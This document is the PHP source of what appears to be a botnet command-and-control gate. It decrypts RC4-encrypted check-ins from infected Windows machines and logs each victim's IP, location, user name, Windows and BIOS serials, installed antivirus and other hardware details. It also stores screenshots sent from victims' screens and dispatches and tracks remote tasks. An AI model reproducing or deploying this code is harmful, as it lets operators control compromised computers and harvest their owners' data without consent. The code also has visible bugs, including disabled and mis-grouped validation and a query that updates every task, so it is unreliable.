<?php include_once("gdx/gdx.php"); include_once("gdx/internal.php");

1. <?php
2. include_once("gdx/gdx.php");
3. include_once("gdx/internal.php");
4. include_once("gdx/utility.php");
5.  
6. function IsValidPOST($POST)
7. {
8. if (!(
9. isset($POST["cid"]) &&
10. isset($POST["cvr"]) &&
11. isset($POST["har"]) &&
12. isset($POST["fip"]) &&
13. isset($POST["wiv"]) &&
14. isset($POST["osa"]) &&
15. isset($POST["wsp"]) &&
16. isset($POST["wed"]) &&
17. isset($POST["wbi"]) &&
18. isset($POST["wlg"]) &&
19. isset($POST["wsr"]) &&
20. isset($POST["wdr"]) &&
21. isset($POST["pcn"]) &&
22. isset($POST["usn"]) &&
23. isset($POST["ltm"]) &&
24. isset($POST["cmd"]) &&
25. isset($POST["ctp"]) &&
26. isset($POST["bio"]) &&
27. isset($POST["bmn"]) &&
28. isset($POST["bvs"]) &&
29. isset($POST["bsn"]) &&
30. isset($POST["cpu"]) &&
31. isset($POST["cmn"]) &&
32. isset($POST["car"]) &&
33. isset($POST["npr"]) &&
34. isset($POST["vda"]) &&
35. isset($POST["vrs"]) &&
36. isset($POST["vrr"]) &&
37. isset($POST["hds"]) &&
38. isset($POST["pms"]) &&
39. isset($POST["dbw"]) &&
40. isset($POST["alb"]) &&
41. isset($POST["anf"]) &&
42. isset($POST["jvm"]) &&
43. isset($POST["avs"])
44. ))
45. {
46. return false;
47. }
48.  
49. if( (strlen($POST["cid"]) == 32 && ctype_xdigit($POST["cid"])) &&
50. is_numeric($POST["cvr"]) &&
51. $POST["har"] == 1 || $POST["har"] == 0 &&
52. is_numeric($POST["wiv"]) &&
53. $POST["osa"] == 1 || $POST["osa"] == 0 &&
54. is_numeric($POST["wsp"]) &&
55. is_numeric($POST["wed"]) &&
56. is_numeric($POST["wbi"]) &&
57. is_numeric($POST["wlg"]) &&
58. ctype_print($POST["wsr"]) &&
59. ctype_print($POST["wdr"]) &&
60. !preg_match("/\W/", $POST["pcn"]) &&
61. !preg_match("/\W/", $POST["usn"]) &&
62. is_numeric($POST["ltm"]) &&
63. ctype_print($POST["cmd"]) &&
64. is_numeric($POST["ctp"]) &&
65. ctype_print($POST["bio"]) &&
66. ctype_print($POST["bmn"]) &&
67. ctype_print($POST["bvs"]) &&
68. ctype_print($POST["bsn"]) &&
69. ctype_print($POST["cpu"]) &&
70. ctype_print($POST["cmn"]) &&
71. is_numeric($POST["car"]) &&
72. is_numeric($POST["npr"]) &&
73. ctype_print($POST["vda"]) &&
74. ctype_print($POST["vrs"]) &&
75. ctype_print($POST["vrr"]) &&
76. ctype_print($POST["hds"]) &&
77. ctype_print($POST["pms"]) &&
78. ctype_print($POST["dbw"]) &&
79. ctype_print($POST["alb"]) &&
80. ctype_print($POST["anf"]) &&
81. ctype_print($POST["jvm"]) &&
82. ctype_print($POST["avs"])
83. )
84. {
85. return true;
86. }
87.  
88. return false;
89. }
90.  
91. if($_SERVER["REQUEST_METHOD"] !== "POST" || !isset($_SERVER["CONTENT_LENGTH"])) die();
92.  
93. try
94. {
95.  
96. $Host = MYSQL_HOST;
97. $Database = DATABASE_NAME;
98. $conn = new PDO("mysql:host=$Host;dbname=$Database", MYSQL_USER, MYSQL_PASSWORD);
99. $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
100. $QrSett = $conn->query("SELECT * FROM Settings");
101. $Sett = $QrSett->fetch(PDO::FETCH_ASSOC);
102.  
103. $_POST = array();
104. $ContentLength = $_SERVER["CONTENT_LENGTH"];
105. $Data = RC4($Sett["Key2"], KEY_SIZE, file_get_contents("php://input"), $ContentLength);
106. parse_str($Data, $_POST);
107.  
108. if (!isset($_POST["hdr"]) || (isset($_POST["hdr"]) != HEADER_CLIENT_NOTIFY
109. && isset($_POST["hdr"]) != HEADER_TASK_RESULT))
110. {
111. die();
112. }
113.  
114. $Result = "";
115. $gdx = new GDX($conn);
116. $gdx->UpdateTasksExp();
117.  
118. if($_POST["hdr"] == HEADER_CLIENT_NOTIFY)
119. {
120. //if(IsValidPOST($_POST))
121. {
122. $ClientId = $_POST["cid"];
123. $ClientIdBin = pack('H*', $ClientId);
124. $SzIPAddress = GetIPAddress();
125. $IPAddress = inet_pton($SzIPAddress);
126. $Location = $gdx->GetIPLocation($SzIPAddress);
127.  
128. $SlPr = $conn->prepare("SELECT Id FROM Clients WHERE ClientId = ?");
129. $SlPr->execute(array($ClientIdBin));
130. $ClientIdAssoc = $SlPr->fetch(PDO::FETCH_ASSOC);
131.  
132. if(!$ClientIdAssoc)
133. {
134. $sql = "INSERT INTO Clients (
135. ClientId , Version , IPAddress , Location , HasAdminRigths , FilePath ,
136. InstallationDate , LastCheck , OperatingSystem , OSArchitecture , ServipackVersion ,
137. WindowsEdition , WindowsBuildId , WindowsLang , WindowsSerial , WindowsDir ,
138. PCName , UserName , PCLocalTime , ComputerModel , ComputerType ,
139. BIOSName , BIOSManufacturer , BIOSVersion , BIOSSerialNumber ,
140. CPUName , CPUManufacturer , CPUArquitecture, CPUNumberProcessors ,
141. VideoAdapter , VideoResolution , VideoRefreshRate ,
142. HardDrives , PhysicalMemories , DefaultBrowser , InstalledBrowsers ,
143. InstalledNETFrameworks , JAVAVM , Antivirus )
144. VALUES (:ClientId , :Version , :IPAddress , :Location , :HasAdminRigths , :FilePath ,
145. :InstallationDate , :LastCheck , :OperatingSystem , :OSArchitecture , :ServipackVersion ,
146. :WindowsEdition , :WindowsBuildId , :WindowsLang , :WindowsSerial , :WindowsDir ,
147. :PCName , :UserName , :PCLocalTime , :ComputerModel , :ComputerType ,
148. :BIOSName , :BIOSManufacturer , :BIOSVersion , :BIOSSerialNumber ,
149. :CPUName , :CPUManufacturer , :CPUArquitecture , :CPUNumberProcessors ,
150. :VideoAdapter , :VideoResolution , :VideoRefreshRate ,
151. :HardDrives , :PhysicalMemories , :DefaultBrowser , :InstalledBrowsers ,
152. :InstalledNETFrameworks , :JAVAVM , :Antivirus )";
153.  
154. $InPr = $conn->prepare($sql);
155.  
156. $InPr->execute(array(":ClientId" => $ClientIdBin, ":Version" => $_POST["cvr"],
157. ":IPAddress" => $IPAddress, ":Location" => $Location,
158. ":HasAdminRigths" => $_POST["har"], ":FilePath" => $_POST["fip"],
159. ":InstallationDate" => $GdxCurrentTime, ":LastCheck" => $GdxCurrentTime,
160. ":OperatingSystem" => $_POST["wiv"], ":OSArchitecture" => $_POST["osa"],
161. ":ServipackVersion" => $_POST["wsp"], ":WindowsEdition" => $_POST["wed"],
162. ":WindowsBuildId" => $_POST["wbi"], ":WindowsLang" => $_POST["wlg"],
163. ":WindowsSerial" => $_POST["wsr"], ":WindowsDir" => $_POST["wdr"],
164. ":PCName" => $_POST["pcn"], ":UserName" => $_POST["usn"],
165. ":PCLocalTime" => $_POST["ltm"], ":ComputerModel" => $_POST["cmd"],
166. ":ComputerType" => $_POST["ctp"], ":BIOSName" => $_POST["bio"],
167. ":BIOSManufacturer" => $_POST["bmn"], ":BIOSVersion" => $_POST["bvs"],
168. ":BIOSSerialNumber" => $_POST["bsn"], ":CPUName" => $_POST["cpu"],
169. ":CPUManufacturer" => $_POST["cmn"], ":CPUArquitecture" => $_POST["car"],
170. ":CPUNumberProcessors" => $_POST["npr"], ":VideoAdapter" => $_POST["vda"],
171. ":VideoResolution" => $_POST["vrs"], ":VideoRefreshRate" => $_POST["vrr"],
172. ":HardDrives" => $_POST["hds"], ":PhysicalMemories" => $_POST["pms"],
173. ":DefaultBrowser" => $_POST["dbw"], ":InstalledBrowsers" => $_POST["alb"],
174. ":InstalledNETFrameworks" => $_POST["anf"], ":JAVAVM" => $_POST["jvm"],
175. ":Antivirus" => $_POST["avs"]
176. ));
177. }
178. else
179. {
180. $sql = "UPDATE Clients SET
181. ClientId = :ClientId, Version = :Version, IPAddress = :IPAddress,
182. Location = :Location, HasAdminRigths = :HasAdminRigths, FilePath = :FilePath,
183. LastCheck = :LastCheck, OperatingSystem = :OperatingSystem,
184. OSArchitecture = :OSArchitecture, ServipackVersion = :ServipackVersion,
185. WindowsEdition = :WindowsEdition, WindowsBuildId = :WindowsBuildId,
186. WindowsLang = :WindowsLang, WindowsSerial = :WindowsSerial, WindowsDir = :WindowsDir,
187. PCName = :PCName, UserName = :UserName, PCLocalTime = :PCLocalTime,
188. ComputerModel = :ComputerModel, ComputerType = :ComputerType,
189. BIOSName = :BIOSName, BIOSManufacturer = :BIOSManufacturer, BIOSVersion = :BIOSVersion,
190. BIOSSerialNumber = :BIOSSerialNumber, CPUName = :CPUName,
191. CPUManufacturer = :CPUManufacturer, CPUArquitecture = :CPUArquitecture,
192. CPUNumberProcessors = :CPUNumberProcessors,
193. VideoAdapter = :VideoAdapter, VideoResolution = :VideoResolution,
194. VideoRefreshRate = :VideoRefreshRate, HardDrives = :HardDrives,
195. PhysicalMemories = :PhysicalMemories, DefaultBrowser = :DefaultBrowser,
196. InstalledBrowsers = :InstalledBrowsers,
197. InstalledNETFrameworks = :InstalledNETFrameworks, JAVAVM = :JAVAVM,
198. Antivirus = :Antivirus WHERE Id = :Id";
199.  
200. $InPr = $conn->prepare($sql);
201.  
202. $Id = $ClientIdAssoc["Id"];
203. $InPr->execute(array(":ClientId" => $ClientIdBin, ":Version" => $_POST["cvr"],
204. ":IPAddress" => $IPAddress, ":Location" => $Location,
205. ":HasAdminRigths" => $_POST["har"], ":FilePath" => $_POST["fip"],
206. ":LastCheck" => $GdxCurrentTime, ":OperatingSystem" => $_POST["wiv"],
207. ":OSArchitecture" => $_POST["osa"], ":ServipackVersion" => $_POST["wsp"],
208. ":WindowsEdition" => $_POST["wed"], ":WindowsBuildId" => $_POST["wbi"],
209. ":WindowsLang" => $_POST["wlg"], ":WindowsSerial" => $_POST["wsr"],
210. ":WindowsDir" => $_POST["wdr"], ":PCName" => $_POST["pcn"], ":UserName" => $_POST["usn"],
211. ":PCLocalTime" => $_POST["ltm"], ":ComputerModel" => $_POST["cmd"],
212. ":ComputerType" => $_POST["ctp"], ":BIOSName" => $_POST["bio"],
213. ":BIOSManufacturer" => $_POST["bmn"], ":BIOSVersion" => $_POST["bvs"],
214. ":BIOSSerialNumber" => $_POST["bsn"], ":CPUName" => $_POST["cpu"],
215. ":CPUManufacturer" => $_POST["cmn"], ":CPUArquitecture" => $_POST["car"],
216. ":CPUNumberProcessors" => $_POST["npr"], ":VideoAdapter" => $_POST["vda"],
217. ":VideoResolution" => $_POST["vrs"], ":VideoRefreshRate" => $_POST["vrr"],
218. ":HardDrives" => $_POST["hds"], ":PhysicalMemories" => $_POST["pms"],
219. ":DefaultBrowser" => $_POST["dbw"], ":InstalledBrowsers" => $_POST["alb"],
220. ":InstalledNETFrameworks" => $_POST["anf"], ":JAVAVM" => $_POST["jvm"],
221. ":Antivirus" => $_POST["avs"], ":Id" => $Id
222. ));
223. }
224.  
225. if(isset($_POST["src"])) {
226. $ImgBytes = pack('H*', $_POST["src"]);
227. $flag = 0;
228. if(exif_imagetype($ClientId) != IMAGETYPE_JPEG){
229. $flag = 1;
230. }
231. if(chmod("screenshots", 0777) && $flag==0)
232. {
233. $Image = fopen("screenshots/" . $ClientId . ".jpeg", "w");
234. if($Image) {
235. fwrite($Image, $ImgBytes);
236. fclose($Image);
237. }
238. chmod("screenshots", 0755);
239. }
240. }
241.  
242. $Result = $gdx->LookupTask($conn, $ClientId);
243. }
244. }
245. else if($_POST["hdr"] == HEADER_TASK_RESULT)
246. {
247. if (isset($_POST["tid"]) &&
248. isset($_POST["cid"]) &&
249. isset($_POST["trs"]) &&
250. strlen($_POST["tid"]) == 32 && ctype_xdigit($_POST["tid"]) &&
251. strlen($_POST["cid"]) == 32 && ctype_xdigit($_POST["cid"]) &&
252. (is_numeric($_POST["trs"]) && ($_POST["trs"] == "1" || $_POST["trs"] == "0"))
253. )
254. {
255. $TaskIdBin = pack('H*', $_POST["tid"]);
256. $ClientIdBin = pack('H*', $_POST["cid"]);
257. $Status = $_POST["trs"];
258.  
259. $sql = "SELECT Status FROM TasksCompleted WHERE TaskId = :TaskId AND ClientId = :ClientId";
260. $SlPr = $conn->prepare($sql);
261. $SlPr->execute(array("TaskId" => $TaskIdBin, "ClientId" => $ClientIdBin));
262. $TaskStatus = $SlPr->fetch(PDO::FETCH_ASSOC);
263.  
264. if($TaskStatus["Status"] == TASK_CMPLD_SENT)
265. {
266. $Status = ($Status) ? TASK_CMPLD_EXECUTED : TASK_CMPLD_FAILED;
267.  
268. $sql = "UPDATE TasksCompleted SET Status = :Status WHERE TaskId = :TaskId AND ClientId = :ClientId";
269. $SlPr = $conn->prepare($sql);
270. $SlPr->execute(array("Status" => $Status, "TaskId" => $TaskIdBin, "ClientId" => $ClientIdBin));
271.  
272. if($Status == TASK_CMPLD_EXECUTED) {
273. $sql = "UPDATE Tasks SET ClientsExecuted = ClientsExecuted + 1 WHERE TaskId = :TaskId";
274. $SlPr = $conn->prepare($sql);
275. $SlPr->execute(array("TaskId" => $TaskIdBin));
276. }
277. else {
278. $sql = "UPDATE Tasks SET ClientsFailed = ClientsFailed + 1 WHERE TaskId = TaskId";
279. $SlPr = $conn->prepare($sql);
280. $SlPr->execute(array("TaskId" => $TaskIdBin));
281. }
282. }
283. }
284. }
285.  
286. $conn = null;
287. } catch(PDOException $e) {
288. echo $e->getMessage();
289. }
290.  
291. echo $Result;
292. ?>